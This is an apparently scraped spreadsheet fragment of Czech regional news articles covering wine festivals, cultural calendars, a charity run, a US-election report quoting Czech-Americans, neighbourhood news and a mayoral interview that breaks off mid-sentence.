    <t>Sv. Martin na Hovoransku – den otevřených sklepů 0 z 5 fotografie Na již 10. ročníku můžete ochutnat jak mladá a Svatomartinská vína od našich vinařů, tak výběr z minulých ročníků. Ochutnáte také různé pochutiny jako např. svatomartinská husa, husí paštika s brusinkami, svatomartinská pochoutka atd. Po celý den budou zpívat pěvecké sbory a bude další doprovodný program. Večer se můžete těšit na Cimbálovou muziku v sále Sokolovny. Reklama Akce se koná 16. listopadu 2024 od 11.00 do 19.00 hod., od 20.00 hod. bude hrát cimbálová muzika. Prodej vína je i v neděli 17. listopadu 2024 od 9.00 do 12.00 hod. Vstupné v předprodeji 900 Kč, na místě 1000 Kč. Předprodej probíhá na portále SMSTICKET. Vstupné zahrnuje volnou neomezenou ochutnávku vín, skleničku, brožurku s mapkou všech vinařů, 4 kupóny v hodnotě 100 korun k odběru vína a vstup na večerní zábavu s Cimbálovou muzikou. Prodej vstupenek na místě a výdej předprodeje proběhne v den akce v obecním sklepě v Hovoranech od 11.00 do 16.00 hod. a také v pátek 15. listopadu v Rodinném vinařství Zahnaš od 17.00 do 19.00 hod. Reklama Autor: Pavel Kovář Autor person Pavel Kovář</t>
  </si>
  <si>
    <t>20241101_498_3241562464_032fd83e96d335f00b41.html</t>
  </si>
  <si>
    <t>032fd83e96d335f00b41</t>
  </si>
  <si>
    <t>Kultura</t>
  </si>
  <si>
    <t>Kultura Komunitní centrum Moravia PRAVIDELNÉ Po – Pá 10 – 17 hod. ZÁZEMÍ PRO DĚTI A RODIČE St 16 – 17 hod. FREESHOP DEJBER Po – Pá 10 – 17 hod. OTEVŘENÁ KOMUNITNÍ ZAHRADA MĚSÍČNÍ PROGRAM Galerie Komunitního centra Moravia 4. - 30. 11. Ludmila Babu Klhůfková: EXPRESE (výstava obrazů) Malá galerie v Knihobudce So 2. 11. od 15 – 18.30 hod. SVAČINA FŠEM – představení spolku Po 4. 11. od 14.30 – 17 hod. PORADENSTVÍ V OBLASTI NRP - INFORMAČNÍ SERVIS K PĚSTOUNSKÉ PÉČI St 6. 11., 9.30 – 19 hod. DEN KOREJSKÉ KULTURY V KC MORAVIA Dopolední program: 9.30 – 11.30 hod. - posezení u čaje s korejskými dobrotami. Korejská tradiční řemesla, zábavné hry, tradiční oblečení a focení, taekwondo, KPOP tanec, zpěv: Duet a sbor, populární jídla. Čt 7. 11., 15 – 17 hod. - v rámci Týdne pěstounství - Bára Procházková. BESEDA DOBRÁ RODINA Út 12. 11., 9.30 – 12 hod. PEČUJÍCÍ TŘEBÍČ - SETKÁNÍ SVÉPOMOCNÉ SKUPINY St 13. 11., 15 – 18 hod. BLANKA ZELNÍČKOVÁ: KURZ PEDIGU Čt 14. 11., 13 – 15 hod. SETKÁNÍ SVÉPOMOCNÉ SKUPINY SEBEOBHÁJCI So 16. 11 hod. od 8 – Ne 17. 11. Do 19 hod. VAIB - POHYBOVĚ VZDĚLÁVACÍ VÍKEND Propojení pohybu, mysli, umění a lidí. Pá 22. 11., od 19.30 hod. TRANZAN - NA KŘÍDLECH MOTÝLA - páteční večer s hudbou. So 23. 11., od 16 – 17 hod. MAGIE ARMÉNSKÉ HUDBY Ne 24. 11., 17 – 19 hod. ČAJ O PÁTÉ: Majka &amp;amp; Jarda a Karel Böhm Po 25. 11., od 15 hod. VÝROBA VĚNCŮ S PEŤOU St 27. 11., od 17 – 18.30 hod. STOPAŘEM PO EVROPĚ - Robert Knebl PŘÁNÍ PRO OSAMĚLÉ Dovolujeme si vyzvat všechny dobrovolníky, kteří mají chuť se zapojit - sběr přání do 12. 12. v KC Moravia - vítána je pomoc s distribucí! Zadní synagoga Sobota 9. listopadu – Kafkovské představení v podání kapely SchimmerleKlezmer Kabaret - kabaretní vyšetřování na motivy románu „Nezvěstný“, proložené písněmi z 19. a 20. století, rámované absurdním humorem ze znepokojivého světa Franze Kafky – 18 hod. Městská knihovna Čtvrtek 7. listopadu, 17 hod., pobočka Modřínová Přes Rakousko-Uhersko na skládacím kole, 2. díl: Polsko vojáka Švejka / Milan Krčmář Pondělí 11. listopadu, 9 hod., pobočka Modřínová Zájmové vzdělávání seniorů: Antonín Dvořák / Eva Hejsková Úterý 26. listopadu, 8, 8.35, 9.10 a 9.45 hod.,pobočka Modřínová Pasování prvňáčků ZŠ Benešova Sobota 30. listopadu ve 14 hod., pobočka Modřínová Vánoční pohádka / Divadelní společnost Radomíry Horákové VÝSTAVY Barevný podzim / ZŠ a MŠ Na Kopcích 4. - 29. listopadu, pobočka Modřínová Výstava výrobků dětí Divadla a koncerty Úterý 5. 11. v 19 hod. - Národní dům Třebíč TOMÁŠ VEJMOLA – CESTOVATELSKÁ STAND-UP „AFRIKA S TOMÍKEM“ - Národní dům Třebíč Čtvrtek 7. 11. v 19 hod. FRAGILE - slovenská vokální skupina Pátek 8. 11. v 18 hod. - Národní dům TŘEBÍČSKÝ KOTLÍK Osmý ročník úspěšného programu pořádaný Kamarády staré řeky. - Karlovo náměstí Třebíč Pondělí 11. 11. v 11.11 hod. SVATOMARTINSKÉ SLAVNOSTI Celodenní oslava svátku populárního světce, tradičně spojována s konzumací pečené husy a mladého vína . Bohatý kulturní program. - Foyer divadla Pasáž Třebíč Úterý 12. 11. v 19 hod. SMYČCOVÉ TRIO GIDEON Čtvrtek 14. 11. v 19 hod. - Národní dům Třebíč ROMAN HORKÝ 60 KAMELOT „Zaprášené diamanty Tour 2024“ - Karlovo náměstí Třebíč Neděle 17. 11. v 18 hod. SVĚTLO PRO 17. LISTOPAD Oslava státního svátku spojená s lampionovým průvodem. - Národní dům (stolová úprava) Třebíč Úterý 19. 11. v 19 hod. TOM BOWLING KERS &amp;amp; HIS STRI- - Divadlo Pasáž Třebíč Středa 20. 11. v 19 hod. - VÁCLAV MAREK s orchestrem VÁNOČNÍ KONCERT 2024 - Divadlo Pasáž Třebíč - pro rodiče s dětmi Neděle 24. 11. v 16 hod. DOCELA VELKÉ DIVADLO LITVÍNOV BETLÉMSKÁ HVĚZDA - Divadlo Pasáž Třebíč Středa 27. 11. v 19 hod. EVA URBANOVÁ &amp;amp; BAROCK KOSTKOHRANÍ 9.-10. 11. Základní škola Světlo Církevní akce Tradiční svatomartinský průvod světýlek bude v pátek 15. listopadu v 16 hodin. Zahájení v kostele sv. Martina, zakončení teplým čajem na faře. S sebou lampion s el. svíčkou, teplé oblečení, příp. baterku nebo čelovku. V pátek 1. listopadu v 16 hod. o svátku Všech svatých bude mše svatá na Starém hřbitově a po ní průvod a modlitby za zemřelé na hřbitově. V neděli 3. listopadu bude společná modlitba za zemřelé na Novém hřbitově. Účastníci se sejdou před obřadní síní v 15 hod. Ve čtvrtek 7. 11. v 18.30 bude setkání zástupců pastoračních rad v Katolickém gymnáziu. BAZILIKA Adoramus Te - komorní koncert duchovní hudby bude v pátek 1. 11. v 18 hod. v bazilice. Účinkuje: Auris Brunensis. V sobotu 2. 11. bude mše svatá v 8 hod. v kryptě. V sobotu 2. 11. bude v Sokolí mše svatá s nedělní platností v 17 hod. a po ní bude následovat modlitba za zemřelé na hřbitově. JEJKOV V sobotu 2. 11. – mše sv. za zemřelé bude ráno v 7 hod. Modlitby za zemřelé - Slavice (hřbitov) – pátek 1. 11. v 16 hod.; Střítež – sobota 2. 11. v 17 hod. (mše sv. a modlitba na hřbitově); Střížov – neděle 3. 11. v 10.45 hod. (mše sv. a modlitba na hřbitově); Kožichovice – pondělí 4. 11. v 17 hod. (mše sv. a modlitba na hřbitově); Vladislav – úterý 5. 11. v 16 hod. modlitba na hřbitově, v 17 hod. mše sv. Ministrantský turnaj v banďáku - v sobotu 9. 11. od 9 hod. na hřišti u Obůrky MARTIN Příprava dětí na 1. svaté přijímání začne ve středu 13. listopadu v 17 hodin v Učebně kostela u kůru. Po celý dušičkový oktáv je mše svatá nebo bohoslužba slova v kostele Nejsvětější Trojice na Starém hřbitově.</t>
  </si>
  <si>
    <t>23250</t>
  </si>
  <si>
    <t>20241101_499_3241609401_d66afc7b9a1210614dce.html</t>
  </si>
  <si>
    <t>d66afc7b9a1210614dce</t>
  </si>
  <si>
    <t>Běh naděje podpořil onkologii Sportovci nebudou v MHD platit</t>
  </si>
  <si>
    <t>Běh naděje podpořil onkologii Sportovci nebudou v MHD platit Běh naděje se uskutečnil v Třebíči ve čtvrtek 3. října. Vybíhalo se tradičně poblíž sochy plk. Švece v Tyršových sadech a cíl pořadatelé stanovili na sokolském stadionu. Startování se ujal Jaroslav Bohutínský , byť na hlasivkách bylo slyšet, že bojuje s nachlazením. Velice ho potěšilo, že Běhu naděje v Třebíči se zúčastnilo registrovaných 169 účastníků a na účet Běhu naděje bylo odesláno 19.673 korun. A na startu se sešli nejmenší běžci až po ty nejstarší. Jen pro připomenutí, Běh naděje jako známá humanitárně -sportovní akce je pořádána každoročně po celém světě a jejím hlavním posláním je shromažďování prostředků na výzkum rakoviny a propagace pravidelného sportování. Od roku 2008 se v České republice koná pod novým názvem Běh naděje, avšak se stejnými cíli. Zdravý životní styl a pravidelný pohyb jsou důležitými faktory při předcházení zhoubným chorobám i jiným zdravotním neduhům. Tento běh je v České republice pořádán již od roku 1992. V mezinárodním srovnání Česká republika zaujímá dlouhodobě první místo na světě počtem míst, v nichž se v rámci kalendářního roku běh uskuteční, i počtem zaregistrovaných účastníků těchto běhů. Výtěžek sbírky je každoročně na základě rozhodnutí odborné grantové komise České onkologické společnosti při České lékařské společnosti JEP přidělen vybraným českým a moravským výzkumným pracovištím. -zt- Zahajovací ceremoniál 9. ročníku fotbalového turnaje Třebíč Open 2025 se uskuteční v červnu. Rada města souhlasí s povolením zvláštního užívání Karlova náměstí v termínu od 20. do 23. června. Dále souhlasí s povolením uzavírky místní komunikace, prostor před radnicí, horní strana náměstí od Jihlavské brány po křižovatku s ulicí Přerovského v termínu 21. června od 10 do 20 hodin za účelem pořádání zahajovacího ceremoniálu. Účastníci turnaje nebudou v městské hromadné dopravě platit. Zároveň rada rozhodla udělit výjimku v době zahájení turnaje z vyhlášky o zákazu konzumace alkoholu na Karlově náměstí . Turnaje se každoročně účastní mladí fotbalisté z celé České republiky . Přijíždějí i mužstva ze zahraničí, například ze Slovenska , Rakouska či Itálie . Příští rok se bude konat devátý ročník. Letos turnaj přilákal 140 týmů. Hráči a hráčky soutěžili ve dvanácti mládežnických kategoriích, z nichž sedm bylo určeno pro chlapce a pět pro dívky v celkem deseti arénách rozdělených na 27 hřišť po celém Třebíčsku. Celý víkend byl naplněn fotbalem, přičemž se uskutečnilo více než 750 utkání. Vrcholným okamžikem byl slavnostní ceremoniál na Karlově náměstí v Třebíči , který nabídl nejen slavnostní nástup všech účastníků, ale také promítání zápasů z EURO24 na velkoplošné obrazovce, čímž vytvořil nezapomenutelnou atmosféru pro všechny přítomné. –zt- NA START v Tyršových sadech se sešly všechny generace. Foto: Antonín Zvěřina</t>
  </si>
  <si>
    <t>20241101_5_3267147681_5cc9c9f0ebe3c0f2e48c.html</t>
  </si>
  <si>
    <t>5cc9c9f0ebe3c0f2e48c</t>
  </si>
  <si>
    <t>Degustační seminář – Chardonnay</t>
  </si>
  <si>
    <t>Degustační seminář – Chardonnay Seminář o víně s profesionálním degustátorem Zdeňkem Sklenským z vinařství Fučík z Mikulova . Chardonnay – Champagne , Burgundsko , Kalifornie a vlastně celý svět. Dozvíte se: • Historii a původu odrůdy Chardonnay • Jaké mají tato vína senzorické vlastnosti, o vinifikaci a pěstování • Nejvýznamnější regiony a nejznámější vína na světě • Rozdíly v Chardonnay mezi Českou republikou a ve světě ( Evropa , Burgundsko , Champagne , Kalifornie , JAR, Austrálie , jižní Amerika ) Ochutnáme 11 vzorků exckluzivních vín Seminář trvá 3 hodiny a koná se v Národním zemědělském muzeu Ostrava. V ceně tapas od Pata Negra po celý večer a studijní materiály. Počasí: dnes 8 °C Rychlost větru: 2 m/s Tlak: 1030 hPa Vlhkost: 61 % Rychlost větru: 1 m/s Tlak: 1028 hPa Vlhkost: 63 % Rychlost větru: 3 m/s Tlak: 1028 hPa Vlhkost: 57 % Rychlost větru: 2 m/s Oblačnost: 97 % Tlak: 1028 hPa Vlhkost: 68 % Rychlost větru: 1 m/s Oblačnost: 83 % Tlak: 1029 hPa Vlhkost: 71 % Rychlost větru: 6 m/s Oblačnost: 10 % Tlak: 1025 hPa Vlhkost: 69 % Rychlost větru: 4 m/s Oblačnost: 53 % Tlak: 1019 hPa Vlhkost: 69 % Rychlost větru: 2 m/s Oblačnost: 100 % Tlak: 1026 hPa Vlhkost: 86 % &amp;lt; &amp;gt;</t>
  </si>
  <si>
    <t>20241101_50_3253887582_5c8d7e78915d1c9f4ebb.html</t>
  </si>
  <si>
    <t>5c8d7e78915d1c9f4ebb</t>
  </si>
  <si>
    <t>O volbách s Čechoameričany</t>
  </si>
  <si>
    <t>O volbách s Čechoameričany Roman Šebrle , moderátor: Našli byste mezi nimi jak podporovatelé Kamaly Harrisové, tak Donalda Trumpa . Soňa Porupková, moderátorka: Stejně jako Američané i Češi, kteří žijí za oceánem, mají různé představy o tom, jakým směrem by se měly Spojené státy ubírat. Roman Šebrle , moderátor: Naše štáby navštívily během posledních dnů mimo jiné třeba Jižní Karolínu nebo Minnesotu . Daniel Konewka, reportér: Zásadový jižan a vysloužilý voják z Alabamy a stejně přímočará, ale zároveň laskavá a podnikavá rodačka z Brna . Keith a Katka si pro svůj americký sen vybrali Jižní Karolínu. Během koronavirové pandemie ale žili několik měsíců v Košicích . Keith tam učil afghánské piloty létat na amerických vrtulnících Blackhook. Keith , americký veterán, manžel Katky: Přijeli jsme tam ještě předtím, než se začaly zavádět tvrdé lockdowny. Lidé na náměstích popíjeli pivo a kolem si hrály děti. Bylo to příjemné. Nepřišlo mi, že by to tam bylo nějak nebezpečné. Zkrátka, působilo to na mě klidným dojmem, a to mi přišlo fajn. Daniel Konewka, reportér: Klidný život a možnost uspořádat si ho podle svých představ. Bezpečné ulice, fungující ekonomika, to jsou věci, které očekávají od příštího prezidenta. Své naděje vkládají do Donalda Trumpa . Katka, Češka žijící ve Spojených státech : On když něco řekne, tak to tak prostě udělá a jde doopravdy potom, co chce dokázat. Lidi mají doopravdy problém přežívat. Trump se snažil toto zastavit a postavil zeď. Já jsem s ním naprosto souhlasila, protože jestli někdo chce vstoupit do jakékoliv země, nejenom USA , tak by to měl udělat legálně. Keith , americký veterán, manžel Katky: Demokraté chtějí otevřené hranice. Je to jednoduché. Nejprve sem pustí přistěhovalce a potom si kupují jejich hlasy. Prodávají jim to, že se o ně stát postará. Jenže náš systém je přehlcený. Daniel Konewka, reportér: Po nahrazení Joea Bidena Kamalou Harris Katka přiznává, že o výsledku voleb stoprocentně přesvědčená není. Katka, Češka žijící ve Spojených státech : No, teď je to jsem taková nervózní. Daniel Konewka, reportér: Na druhé straně Spojených států , ve státě Minnesota , se mezitím náš další štáb setkává s Američankou s českými kořeny Marií Neuzil. Studentka teoretické fyziky se kvůli svému původu rozhodla učinit rodný jazyk svých předků. Maria Neuzil, Američanka českého původu žijící v Minnesotě : Myslím, že důležitější předmět je zdraví byrokracie, a proto budu volit Kamalu Harris, protože myslím, že Trump je hrozný člověk. Kamala Harris bude lepší.</t>
  </si>
  <si>
    <t>628100</t>
  </si>
  <si>
    <t>20241101_500_3241325163_97796454b7902c346fe4.html</t>
  </si>
  <si>
    <t>97796454b7902c346fe4</t>
  </si>
  <si>
    <t>ZPRÁVY OD SOUSEDŮ</t>
  </si>
  <si>
    <t>ZPRÁVY OD SOUSEDŮ KVĚTNICE Rekonstrukce Rybárny začala Květničtí se pustili do rekonstrukce Rybárny, rybářské chatky u rybníka v parku Proutnice, která byla využívána pro různé společenské akce. Během stavebních prací dojde k demolici většiny objektu a na místě v původním „chatkovém“ tvarosloví vznikne důstojná základna pro obecní využití, a to včetně vestavěného nábytku, kompletní kuchyně a čtyř toalet. Objekt bude moci být využíván celoročně, navíc bude i bezbariérový. Rekonstrukce Rybárny vyjde na 6 mil. korun bez DPH, otevření se plánuje na jaře. KLÁNOVICE U Daschů restaurace definitivně nebude Jak informuje Klánovický zpravodaj, v budově U Daschů na nádraží žádná restaurace nakonec obnovena nebude. Developer budovu z 19. století, kde kdysi býval vyhlášený výletní restaurant, kompletně přestavěl na byty, které vznikly i v půdní nástavbě. Restaurace pod tradičním názvem nicméně tak úplně z mapy gastronomických míst nezmizela. Najdeme ji v Šestajovicích , kde ji provozuje původní nájemce klánovické hospody. Vzhledem k tomu, že předloni skončil i bufet na peróně, na pivo na nádraží se dá zaskočit již jen ke Smolíkovi. KOLODĚJE Cyklospojka do Stupic V sousedních Kolodějích vzniká nové spojení pro pěší a cyklisty do Stupic . Krátká, ale více než potřebná spojka, povede od parku Skalka směrem k hranici Středočeského kraje , kde se v budoucnu napojí na novou stupickou cyklostezku. Připomeňme, že do několika let by proměnou mělo projít i spojení severní, tedy do Újezda . V souvislosti se stavbou přeložky I/12 se plánuje výstavba nové tresy pro pěší i cyklisty. SIBŘINA Sázení stromů na polní cestě Obnova polních cest je klíčová nejen pro rozvoj turistiky, ale i pro běžné setkávání. Ne každému se chce k sousedům jezdit autem nebo chodit po frekventované silnici. Nově postavená polní cesta U Hrušky, která navazuje na stejnojmennou ulici v Sibřině a vede jižním směrem ke Křenici, stojí už několik let, letos nicméně obec Sibřina získala grant od Nadace ČEZ , díky němuž polňačku osází stromy. Přijďte si zasadit svou lípu nebo hrušku, a to 10. listopadu od 9:30 hod. po celý den. Sazenice i nářadí je k dispozici na místě. KINO Výjimečný stav (ČR, 2024) Nová komedie Jana Hřebejka . V hlavních rolích Ondřej Vetchý , Tatiana Dyková a Jordan Haj. 9. LISTOPADU OD 19:30 HODIN KC Beseda Klánovice PŘEDNÁŠKA Malajsie a Indonésie - cestovatelská přednáška Bloggerka Kateřina Ostrá vyvrací mýty, že cestování je drahé a časově náročné. 22. LISTOPADU OD 19 HODIN KC Beseda Klánovice KONCERT Jaroslav Hutka Známý český písničkář vystoupí se svým recitálem. 15. LISTOPADU OD 18 HODIN Petašedesátka, Úvaly KONCERT Nebe na zemi Adam Plachetka &amp;amp; Ondřej Havelka a jeho Melody Makers . 22. LISTOPADU OD 19 HODIN KD Jirny Autor: Připravil Blahoslav Hruška Autor person Blahoslav Hruška</t>
  </si>
  <si>
    <t>4000</t>
  </si>
  <si>
    <t>20241101_501_3241325164_202d00424a79574094d6.html</t>
  </si>
  <si>
    <t>202d00424a79574094d6</t>
  </si>
  <si>
    <t>PODZIMNÍ VÝSTAVA OČIMA DĚTÍ I ZAHRÁDKÁŘŮ</t>
  </si>
  <si>
    <t>PODZIMNÍ VÝSTAVA OČIMA DĚTÍ I ZAHRÁDKÁŘŮ Rubrika: SPOLKY Jako každý rok i letos jsme pořádali výstavu ovoce a zeleniny. Tentokrát již po 68. A s velkými obavami. Úroda ovoce po jarních mrazících prakticky žádná, spoléhali jsme, že tradiční vystavovatelé nás nenechají na holičkách a jsme všem vystavovatelům nesmírně vděčni za ovoce, zeleninu, víno a květiny. A můžeme konstatovat, že různé druhy dýní, zelenina, neforemné brambory, které nám příroda nadělila, dětské návštěvníky upoutaly více než různé odrůdy jablek, které jsou pro děti stále jen jablka. Ty jsme také měli v malé míře a zachránili nás př. Šárová nebo manželé Stulíkovi. U nich byl největší zájem o odrůdu Sparťan – škoda, že neexistuje odrůda Slávie. Profesionální ukázka jablek a hrušek byla ze Sadů Vrátkov. Nápadité a velmi zdařilé výtvarné práce dětí a suchá vazba, která byla připravena a nevyužita při kulatém výročí školy, to vše bylo dokonalým doplněním výpěstků. Dokončení aranžmá provedla př. Dlabačová živými rostlinami charakteristickými pro podzim. Bylo hotovo a nám, pochybovačům, jak vše letos dopadne, spadl kámen ze srdce. Jako vždy páteční dopoledne patřilo dětem ze základní školy a mateřských škol, na dotazy odpovídaly a průvodkyní byly př. Carbolová a Skalníková, v moštárně provázel př. Dvořák. Navazovalo, slavnostní zahájení s posezením, letos pro studené počasí ve vytopené klubovně. V sobotu si vystavující své exponáty odnesli, každý s odměnou. Dětem doručíme sladké odměny v nejbližší době. Malá bilance: výstava 68. v pořadí, společná 10. se školami. Vystavujících pěstitelů 21, tříd 17 a čtyři MŠ. Přišlo 585 dětí + doprovod, 83 návštěvníků. Děkujeme všem vystavovatelům – dospělým i dětem, návštěvníkům a příště tradičně začátkem října opět na viděnou. DÝNĚ SKUTEČNÉ I KAŠÍROVANÉ Letošní společná výstava zahrádkářů doplněná výtvory dětí Masarykovy ZŠ a újezdských mateřských škol se konala již podesáté. Jak říkají sami zahrádkáři, výstavu bez dětských prací si už nedovedou představit. A jak je celá výstava pro návštěvníky připravována? Český zahrádkářský svaz každý rok vyhlásí téma, to pak v Újezdě paní učitelky výtvarně s dětmi zpracují, v úterý před výstavou se prázdný prostor v Areálu snů zaplňuje většinou tři hodiny dětskými pracemi, ve čtvrtek aranžují výpěstky zahrádkáři a v pátek dopoledne přicházejí první návštěvníci – školním a školkovým třídám je právě páteční dopoledne vyhrazeno, páteční odpoledne a sobota je určena všem ostatním zájemcům. Letošní rok byl pro zahrádkáře náročný, protože vzhledem k mrazům a nepříznivému počasí byly obavy o množství vystavovaných exponátů. Výzva to bylo naopak po výtvarné tvoření na téma „Úroda ze zahrádek”, takže kašírované dýně, patizony, jablka a hrušky doplnily místo mezi skutečnými výpěstky. My, kteří instalujeme, se vždy těšíme, s jakým nápadem paní učitelky a děti přijdou, protože pohybovat se mezi tolika barvami je radost. Letošní výstava byla ještě doplněna suchými aranžemi, které byly připraveny na výzdobu k 90. výročí školy a spolu s vřesy a chryzantémami od Lucky Dlabačové přispěly k té pravé podzimní náladě. Letos patří poděkování třídám: 1. G, 2. A, 2. C, 2. E, 2. MA, 2. MB, 3. C, 3. D, 4. B, 4. C, 4. E, 5. A, 5. F, 6. M, 7. C, 7. M, Malíři, 1. MŠ, MŠ Sedmikráska , MŠ Sluníčko, MŠ Rohožník. Autor: Blanka Exnerová, Eva Danielová Autoři person Blanka Exnerová person Eva Danielová Rubrika transition_slide SPOLKY</t>
  </si>
  <si>
    <t>20241101_502_3241460226_43ba123aa764cbe2140d.html</t>
  </si>
  <si>
    <t>43ba123aa764cbe2140d</t>
  </si>
  <si>
    <t>STAROSTOVÁNÍ JE MNOHO PROFESÍ NA KAŽDÝ DEN</t>
  </si>
  <si>
    <t>STAROSTOVÁNÍ JE MNOHO PROFESÍ NA KAŽDÝ DEN Rubrika: ZPRÁVY Z RADNICE Aktuální volební období je v poločase, do dalších komunálních voleb zbývají ještě dva roky. Zároveň má starosta Michal Hazdra za sebou rok v čele městské části Praha 21. Nastal tak ideální čas na bilanční rozhovor pro ÚZ, v něm se mimo jiné dozvíte, jak se radnice chystá na dobu, kdy se díky přeložce hlavní silnice dopravně přetíženému Újezdu uleví, jaké šance máme na to, že u nás vznikne střední škola, a také, kde na to všechno vzít. Blahoslav Hruška LONI V LISTOPADU JSTE NASKOČIL DO ROZJETÉHO VLAKU A PŘEVZAL STAROSTOVÁNÍ PO MILANU SAMCOVI. ŠLO VŠECHNO PODLE VAŠICH PŘEDSTAV NEBO JSTE ZAŽIL NĚJAKÁ PŘEKVAPENÍ? Jako místostarosta jsem tak trochu věděl, do čeho jdu, ale přesto ta pestrost a rozsah činností, které má starosta v kompetenci, překonala očekávání. Samozřejmě by to všechno šlo sepsat na papír, dokud to ale nezažijete, tak si to zkrátka neuvědomíte. Kouzlo je v tom umět propojit několik profesí dohromady, musíte být lokálním politikem, a přitom tu projektantem, tu architektem, pak zase údržbářem nebo ceremoniářem. Tím rozhodně nechci říct, že by mě třeba svatby nebo vítání občánků nebavily. Právě naopak, jsem rád mezi lidmi, protože jen tak z kanceláře se městská část řídit nedá. A JAK SE CÍTÍTE V NOVÉ ROLI ŠÉFA TÝMU? Nepřišel jsem zvenčí, své spolupracovníky jsem znal. Tým radních pracuje výborně, mohu se opřít o vedoucí odborů a úředníky. Vím, že to s námi nemají lehké, protože my si toho s místostarosty a radními hodně navymýšlíme, máme plno nápadů, které pak ale někdo musí rozpracovat a dotáhnout do konce. Musím tady zmínit hlavně odbor majetku a investic, který naše nápady „odnáší“ nejvíc. ÚJEZD MÁ (OFICIÁLNĚ) SKORO 11 TISÍC OBYVATEL, ALE PROTI STEJNĚ LIDNATÝM STŘEDOČESKÝM OBCÍM ŘÁDOVĚ NIŽŠÍ ROZPOČET. OBECNÍ KASA TAK UTÁHNE VÍCEMÉNĚ JEN PROVOZ A BĚŽNOU ÚDRŽBU A NA VĚTŠÍ INVESTICE JE TŘEBA SHÁNĚT DOTACE. JAK SI V TOM ÚJEZD VEDE? Řekl bych, že dobře. Stačí se kolem sebe rozhlédnout. Naším hlavním zdrojem jsou dotace z Magistrátu hl. m. Prahy , z nichž paralelně financujeme několik projektů. Zmínil bych především vícegenerační centrum v Lomecké , do jehož příprav jsme zapojili veřejnost a se sousedními obyvateli hledáme řešení provozu a parkování tak, aby vyhovovalo všem. Z peněz magistrátu financujeme i nová hřiště u školy. Tam finišujeme část za tělocvičnou a chceme navázat opravou běžeckého oválu, kde by uprostřed mělo vzniknout hřiště na malý fotbal a příprava na nafukovací halu, protože všichni sportovci se nám do dvou školních tělocvičen zkrátka nevejdou. Díky dotacím právě přijelo úplně nové auto pro naše dobrovolné hasiče a další budeme co nevidět objednávat. Z toho mám velkou radost. No a velký projekt je samozřejmě střední škola, která by Újezdu slušela a doufáme, že to nakonec vyjde. V JAKÉ FÁZI PROJEKT STŘEDNÍ ŠKOLY JE A KDE BY MOHLA STÁT? Jsem rád, že se nám podařilo dostat se mezi čtyři lokality v Praze , kde by magistrát rád zřídil novou střední školu, kterých je v metropoli nedostatek. Máme hotovou architektonickou studii a o prostředky na další kroky zažádáno na magistrátu. Vhodný pozemek je za blatovským fotbalovým hřištěm, kde by mohla vzniknout nová moderní budova s hřištěm i tělocvičnou. Zajímavosti místu přidá i to, že v přímém sousedství soukromý investor připravuje domov pro seniory. Výhodou místa je i blízkost nádraží. O zaměření školy ale bude rozhodovat magistrát, který bude zřizovatelem, byť nějaké představy a preference máme a diskutujeme je. NEDALEKO ODSUD STOJÍ BUDOVA BÝVALÉ TOVÁRNY IDEAL LUX . TAM SE NĚCO RÝSUJE? Probíhají jednání s investory, kteří by tam chtěli provozovat zdravotní středisko. S tím, že by do budovy investovali, platili nájem a po uplynutí smluvní doby by vše připadlo zase městské části. A řekl bych, že ta jednání nejsou na mrtvém bodě, ale posouvají se dál. Stále také platí, že pracujeme na zdravotním středisku Rohožník . Tvoříme úplně nové zdravotní středisko a aktuálně hledáme optimální poměr mezi počtem ordinací a pracovišť a parkovacími místy, které nám předepisují stavební předpisy. Už jen z hlediska demografických výhledů je výhodné mít na místě vícero lékařských specialistů. Zastáváme názor, že by se každému mělo dostat péče tam, kde bydlí. POSUNUL SE NĚKAM I PROJEKT PARKOVACÍCH MÍST PODÉL KOLEJÍ NA NÁDRAŽÍ? Tam jde o dva projekty, které na sebe logicky navazují. Jednak samotné parkování, a pak kompletní rekonstrukce dolní části Staroklánovické ulice , což je projekt, který ale bude realizovat městská společnost TSK , která komunikaci spravuje. Oba projekty jsou ve fázi podané žádosti o stavební povolení. Byli bychom rádi, kdyby se příští rok se stavbou začalo, aby v roce 2026 okolí nádraží mělo konečně takové uspořádání, aby se tam bezpečně cítili chodci, řidiči a cyklisté a aby si nikdo vzájemně nepřekážel. PO LETECH ČEKÁNÍ SE V ŘÍJNU V POLÍCH ZA ÚJEZDEM OBJEVILY BAGRY. DĚLÁ SE SKRÝVKA BUDOUCÍ PŘELOŽKY SILNICE I/12, KTERÁ BY MĚLA PŘINÉST ÚJEZDU CELKOVÉ ZKLIDNĚNÍ DOPRAVY. CHYSTÁ SE V TÉHLE SOUVISLOSTI NĚJAKÉ NOVÉ VYUŽITÍ VEŘEJNÝCH PROSTRANSTVÍ? S majiteli pozemků kolem stávající čerpací stanice jednáme o proměně této části Blatova, abychom podpořili rozkvět jednoho z přirozených center Újezda . Jsem přesvědčen, že pumpa s provozem 24 hodin denně do zástavby zkrátka nepatří. Chceme, aby tu vznikl nový, příjemný prostor s veřejnou vybaveností. Dovedu si tu představit dobíjecí stanici, místo pro tržiště nebo třeba malé bistro a kavárnu. Něco, co bude sloužit širšímu spektru obyvatel, nejen těm, kteří si chtějí natankovat nebo v pozdních nočních hodinách koupit alkohol . A proměnou projde i parčík na Blatově. Chceme z něj udělat příjemné místo pro procházky, posezení, ale i hraní dětí. Počítáme s novou výsadbou keřů a zeleně, využít chceme i starou odvodňovací strouhu, z níž by měl vzniknout biotop nebo takzvané dešťové záhony s kvetoucí vegetací. Samozřejmě s tím, že hlavními dominantami zůstanou křížek, památník obětem války a zvonička. Další prvky budou celý prostor doplňovat. V PŘÍŠTÍM ROCE NÁS ČEKÁ ZVÝŠENÍ DANĚ Z NEMOVITÝCH VĚCÍ. K ČEMU ÚJEZD VÍCE VYBRANÝCH DANÍ POUŽIJE? Předem bych chtěl říct, že ani já ze zvýšení daně jako majitel nemovitosti radost nemám. Ono jde dohromady o nějaké 3 miliony korun navíc, což opravdu mnoho není. Chceme je nicméně použít třeba na lepší údržbu zeleně nebo opravu nejvíc poškozených úseků chodníků podél hlavní silnice. Vím, že se občané také často ptají, kdy se chodníku dočkají také ve vedlejších ulicích. Na řadě míst to ovšem komplikují stavební předpisy. Pokud máme vybudovat chodník a zároveň zachovat šířku vozovky tak, aby tam šlo po straně ještě parkovat, tak tuhle skládačku dohromady v některých místech nedáme. ÚKOLY DO DRUHÉ POLOVINY MANDÁTU RADNICE JSME PROBRALI. CO BY NAOPAK MĚLO ZŮSTAT, CO NENÍ POTŘEBA MĚNIT? Kdo sleduje sociální sítě nebo zpravodaj, tak ví, že tu máme po celý rok řadu spolkových nebo obecních akcí, kde se můžete pobavit, poučit nebo si zasportovat. Jsou to 